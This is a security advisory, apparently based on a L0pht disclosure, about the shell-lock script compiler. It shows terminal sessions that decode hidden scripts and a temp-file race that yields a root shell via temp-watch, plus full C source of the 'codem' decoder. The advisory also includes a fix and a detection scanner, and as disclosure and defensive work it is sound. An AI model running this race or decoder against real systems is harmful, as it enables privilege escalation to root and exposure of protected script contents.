Shell-lock analysis



Vulnerability

    shell-lock

Affected

    Those running shell-lock (available for all UNIX platforms)

Description

    The following is based on a L0pht Security Advisory. (a) A trivial
    encoding mechanism is used to obfuscate the shell code in the
    "compiled" binary. Anyone with read permission on the file in
    question can decode and retrieve the original shell code. A second
    vulnerability lets the user retrieve the un-encoded shell script
    without needing to decode the binary at all.

    (b) The vendors  claim the program  to be useful  in creating SUID
    binaries on systems that do not honor SUID shell scripts and  also
    to protect against the security problems with SUID shell  scripts.
    As it  turns out  any shell-lock  "compiled" program  that is SUID
    root  will  allow  any  user  to  execute  any  program  with root
    privileges.

    Example (a'):

        [slaughter-house] cat q.sh
        #!/bin/sh
        echo "hi there... this is a test"

        [slaughter-house] shell-lock -o q q.sh

                         SHELL-LOCK(tm)
                  Shell Script Security Software
                     Copyright (C) 1989-1999
                    Cactus International, Inc.
                 (Version:  2.1.1.1        7/19/99)

        Converting files:  q.sh

        Compiling.....DEMO Version...
        Success!!

        The shell script "q" has been compiled and placed in "q"
        Conversion successful!!

        [slaughter-house] file q
        q:     ELF 32-bit MSB executable SPARC Version 1, dynamically linked, stripped

        [slaughter-house] ./q
        hi there... this is a test

        [slaughter-house] strings ./q
        (some stuff... not the ascii from the shell script)

        [slaughter-house] ./codem -d -i ./q
        #!/bin/sh
        rm -f $0 2>/dev/null
        echo "hi there... this is a test"

    Example (a''):

        [slaughter-house] temp-watch -d /var/tmp -C 'q*' -D ./ &
        [1] 22971
        [slaughter-house] nice +10 ./q
        hi there... this is a test
        [slaughter-house] more q*
        #!/bin/sh
        rm -f $0 2>/dev/null
        echo "hi there... this is a test"

    Example (b):

        # ls -l q
        -rwxr-xr-x   1 mudge    other      50753 Sep 28 14:24 q
        # chown root q
        # chmod 4755 q
        # exit
        [slaughter-house] id
        uid=789(mudge) gid=1(other)
        [slaughter-house] ls -l q
        -rwsr-xr-x   1 root     other      50753 Sep 28 14:24 q
        [slaughter-house] temp-watch -X '^q*' -R /bin/sh -d /var/tmp &
        [1] 23071
        [slaughter-house] nice +10 ./q
        # id
        uid=0(root) gid=1(other)

    So, what's shell-lock? Have you ever seen the big advertisements
    run in the back of SysAdmin magazine? You know, the ones with the
    Texan with the huge hat and sunglasses? Well, that is Cactus
    software. The program "shell-lock" is used to create ELF binaries
    from shell scripts. It is billed as a Shell Script Compiler, and
    the literature states that the program also hides the original
    shell code so that it cannot be recovered by running strings(1)
    on the binary.

    A  quick  decompilation  shows  that  the  encoding  and  decoding
    routines look as follows:

    0x16194 :     inc  %i4                      Increment the counter
    0x16198 :     srl  %i4, 0x1f, %o0          {
    0x1619c :     add  %i4, %o0, %o0           { testing for odd v even
    0x161a0 :     andn  %o0, 1, %o0            {
    0x161a4 :     cmp  %i4, %o0                {
    0x161a8 :     bne  0x161b8       If they match
    0x161ac :     add  %o1, 0x63, %o2          add 0x63 to the value
    0x161b0 :     b  0x161c0        else
    0x161b4 :     ld  [ %i1 ], %o0
    0x161b8 :     add  %o1, 0x44, %o2          add 0x44 to the value
    0x161bc :     ld  [ %i1 ], %o0
    0x161c0 :    deccc  %o0
    0x161c4 :    bneg  0x16228
    0x161c8 :    st  %o0, [ %i1 ]
    0x161cc :    ld  [ %i1 + 4 ], %o0
    0x161d0 :    add  %o0, 1, %o1
    0x161d4 :    st  %o1, [ %i1 + 4 ]
    0x161d8 :    and  %o2, 0xff, %o1          and with 0xff (hey it's
    0x161dc :    stb  %o1, [ %o0 ]            ascii printable after all)
    0x161e0 :    ld  [ %i0 ], %o0
    0x161e4 :    deccc  %o0

    This basically boils down to the following C code snippet.

    for (i=0; i < strlen ; i++){
        if (!(i % 2))
          outbuff[i] = (inbuff[i] + 0x44) & 0xff;
        else
          outbuff[i] = (inbuff[i] + 0x63) & 0xff;
    }

    Conversely, the decoding subtracts 0x44 and 0x63 alternately. When
    shell-lock creates the initial "compiled" binary from the shell
    script, it adds the line "rm -f $0 2>/dev/null" to the Bourne shell
    script (or "unlink $ZERO ; $ZERO=ENV{'X0'};\n.\nw\nq" for a perl
    script) and encodes the entire file. This is then copied into the
    data section of a skeleton binary file. The binary file, upon
    execution, reads the encoded data section, decodes it and writes it
    out to a temporary file (*note: the default location is /var/tmp
    though it will follow the TMPDIR variable) and then execve's
    /bin/sh to call the program.

    The  first  method  of  extracting  the  data  comes  in using the
    attached  program  to  read  the  binary  and run the data section
    through the decoding routine.

    The second method of extraction  is to use the current  version of
    temp-watch (available  freely from  the L0pht  advisories site) to
    make a copy  of the temporary  file containing the  original shell
    code that is created when the binary is run.

    The SUID root vulnerability lies in the fact that while the
    temporary file is created without any special permissions, the
    process exec'ing it is running as root. Thus, as soon as the
    temporary file appears, a race condition exists in which the user
    can unlink the file and replace it with a different file or a
    symlink to the program they want executed. This is accomplished in
    the above example with the program temp-watch, using arguments
    that specify the replacement of the temporary file with a link to
    /bin/sh. Code follows. temp-watch can be found at

        http://www.l0pht.com/advisories/l0pht-watch.tar.gz

    Below you'll find that archive MIME-encoded, and codem after that.

    ---
    Content-Type: application/octet-stream; name="slock.tgz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="slock.tgz"
    Content-MD5: t3S/3D5mpdTMzHiMH1lhWA==
    
    
    -----

    And now codem:

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <string.h>
    
    void usage(char *);
    
    int main(int argc, char *argv[]){
      int fdin, fdout;
      int i, c;
      ssize_t nread;          /* byte count from read(); no longer shadows strlen(3) */
      long pos = 0;           /* stream position; keeps the even/odd key right across short reads */
      int cryptFlag=0, decryptFlag=0;
      int seekOffset=50688;   /* default offset of the encoded data in the binary */
      char *infile=NULL, *outfile=NULL;
      char inbuff[8192];
      char outbuff[8192];


      while ((c = getopt(argc, argv, "cdhi:o:s:")) != -1){
        switch (c) {
          case 'c':
            cryptFlag++;
            break;
          case 'd':
            decryptFlag++;
            break;
          case 'i':
            infile = optarg;
            break;
          case 'o':
            outfile = optarg;
            break;
          case 's':
            seekOffset = atoi(optarg);
            break;
          case 'h':
            usage(argv[0]);
            break;
          default:
            usage(argv[0]);
            break;
        }
      }

      if ((cryptFlag && decryptFlag) || (!cryptFlag && !decryptFlag)){
        printf("Must specify either -c or -d but not both\n");
        usage(argv[0]);
      }

      if (infile){
        fdin = open(infile, O_RDONLY);
        if (fdin == -1){
          perror("open infile");
          exit(1);            /* do not carry on with an invalid descriptor */
        }
      } else {
        fdin = STDIN_FILENO;
      }

      if (outfile){
        /* O_EXCL: refuse to overwrite an existing file or follow a planted one */
        fdout = open(outfile, O_WRONLY|O_CREAT|O_EXCL, 0644);
        if (fdout == -1){
          perror("open outfile");
          exit(1);
        }
      } else {
        fdout = STDOUT_FILENO;
      }

      memset(inbuff, '\0', sizeof(inbuff));
      memset(outbuff, '\0', sizeof(outbuff));

      /* when decoding, skip the skeleton binary and start at the data section */
      if (decryptFlag)
        lseek(fdin, seekOffset, SEEK_SET);

      /* stop on EOF (0) and on error (-1) */
      while ((nread = read(fdin, inbuff, sizeof(inbuff))) > 0){

        for (i=0; i < nread ; i++, pos++){
          if (cryptFlag){
            /* encode: add 0x44 at even positions, 0x63 at odd ones */
            if (!(pos % 2))
              outbuff[i] = (inbuff[i] + 0x44) & 0xff;
            else
              outbuff[i] = (inbuff[i] + 0x63) & 0xff;
          } else {
            /* decode: subtract the same two values alternately */
            if (!(pos % 2))
              outbuff[i] = inbuff[i] - 0x44;
            else
              outbuff[i] = inbuff[i] - 0x63;
          }
        }

        if (write(fdout, outbuff, nread) != nread){
          perror("write");
          exit(1);
        }
      }

      if (nread == -1){
        perror("read");
        exit(1);
      }

      close(fdin);
      close(fdout);

      return(0);
    }
    
    void usage(char *progname){
    
      char *c;
    
      c = strrchr(progname, '/');
      if (c)
        c++;
      else
        c = progname;
    
      printf("Usage: %s -cd[h] [-i infile] [-o outfile] [-s seek] \n", c);
      printf("  Shell-lock {en,de}coder by mudge@l0pht.com and _lumpy\n");
      printf("    -c  encrypt\n");
      printf("    -d  decrypt\n");
      printf("    -h  help\n");
      printf("    -i <file> input file\n");
      printf("    -o <file> output file\n");
      printf("    -s <offset> seek offset [defaults to 50688]\n");
      exit(1);
    }

Solution

    Do  not  take  candy  or  accept  car  rides  from  strangers.  If
    something seems too  good to be  true it probably  is.  There  are
    few magic solutions that negate  having to do things right  in the
    first place.

    If you need a shell script to run with root privileges consider
    writing it in C or using something like sudo.
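
    The race described above exists because the decoded script is given
    a name in a world-writable directory before /bin/sh opens it. The
    following C program is an added illustration (not shell-lock's code
    and not part of the L0pht advisory) of handing the script to the
    shell over a pipe instead; the function name and the fixed PATH
    value are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical helper: run `script` under /bin/sh by streaming it over a
 * pipe ("sh -s"), so the text never gets a name in /var/tmp or $TMPDIR.
 * Returns the shell's exit status, or -1 on failure. */
int run_script_no_tempfile(const char *script)
{
    static char *const sh_argv[] = { "sh", "-s", NULL };
    /* Fixed environment: the caller's TMPDIR, PATH, ENV etc. are not inherited. */
    static char *const sh_envp[] = { "PATH=/usr/bin:/bin", NULL };
    size_t len = strlen(script), off = 0;
    int pfd[2], status;
    pid_t pid;

    if (pipe(pfd) == -1)
        return -1;
    if ((pid = fork()) == -1) {
        close(pfd[0]);
        close(pfd[1]);
        return -1;
    }
    if (pid == 0) {                      /* child: becomes the shell */
        close(pfd[1]);
        if (pfd[0] != STDIN_FILENO) {
            if (dup2(pfd[0], STDIN_FILENO) == -1)
                _exit(127);
            close(pfd[0]);
        }
        execve("/bin/sh", sh_argv, sh_envp);
        _exit(127);
    }
    close(pfd[0]);                       /* parent: feed the script */
    signal(SIGPIPE, SIG_IGN);            /* the shell may exit before reading it all */
    while (off < len) {
        ssize_t n = write(pfd[1], script + off, len - off);
        if (n <= 0)
            break;
        off += (size_t)n;
    }
    close(pfd[1]);                       /* EOF marks the end of the script */
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample script; $0 is "sh", not a path another user could swap. */
    int rc = run_script_no_tempfile("echo \"running as $0\"\nexit 7\n");
    printf("shell exit status: %d\n", rc);
    return rc == 7 ? 0 : 1;
}
```

    This closes only the temporary-file race, and the script can no
    longer read the caller's standard input. The advice above to write
    privileged logic in C or to use sudo is unchanged.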

    Do not rely upon shell-lock as an obfuscation mechanism for hiding
    the internals of shell scripts in 'compiled' binaries.
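
    To find out which binaries on your own systems carry a shell-lock
    payload, the fixed 0x44/0x63 encoding described above can be used as
    a signature. The C program below is an added example (not from the
    advisory); it assumes the payload begins with a "#!/" interpreter
    line, as in the decoded output shown earlier, and its function names
    and sample data are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Additive key from the advisory: 0x44 on even positions, 0x63 on odd ones. */
static unsigned char sl_decode(unsigned char b, size_t i)
{
    return (unsigned char)(b - ((i % 2) ? 0x63 : 0x44));
}

/* Offset at which buf holds an encoded script, or -1. A hit needs "#!/" plus
 * a printable interpreter line ending in '\n', to weed out chance 3-byte matches. */
long find_encoded_script(const unsigned char *buf, size_t len)
{
    static const char magic[] = "#!/";
    size_t off, i;
    for (off = 0; off + 3 <= len; off++) {
        for (i = 0; i < 3; i++)
            if (sl_decode(buf[off + i], i) != (unsigned char)magic[i])
                break;
        if (i < 3)
            continue;
        for (; off + i < len && i < 64; i++) {
            unsigned char c = sl_decode(buf[off + i], i);
            if (c == '\n')
                return (long)off;
            if (!isprint(c))
                break;
        }
    }
    return -1;
}

/* Constructed sample: `at` filler bytes, then an encoded two-line script. */
size_t build_sample(unsigned char *out, size_t cap, size_t at)
{
    const char *script = "#!/bin/sh\nrm -f $0 2>/dev/null\n";
    size_t n = strlen(script), i;
    if (at + n > cap)
        return 0;
    memset(out, 0x7f, at);
    for (i = 0; i < n; i++)
        out[at + i] = (unsigned char)(script[i] + ((i % 2) ? 0x63 : 0x44));
    return at + n;
}

int main(int argc, char *argv[])
{
    static unsigned char img[1 << 20];   /* only the first 1 MiB is scanned */
    size_t n = build_sample(img, sizeof img, 37);
    FILE *f;
    if (argc > 1) {                      /* scan a real file instead of the sample */
        if (!(f = fopen(argv[1], "rb"))) { perror(argv[1]); return 2; }
        n = fread(img, 1, sizeof img, f);
        fclose(f);
    }
    printf("encoded script at offset %ld\n", find_encoded_script(img, n));
    return 0;
}
```

    Run it over the files listed by "find / -type f -perm -4000" to see
    which SUID binaries need replacing; an offset of -1 means no payload
    was found.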
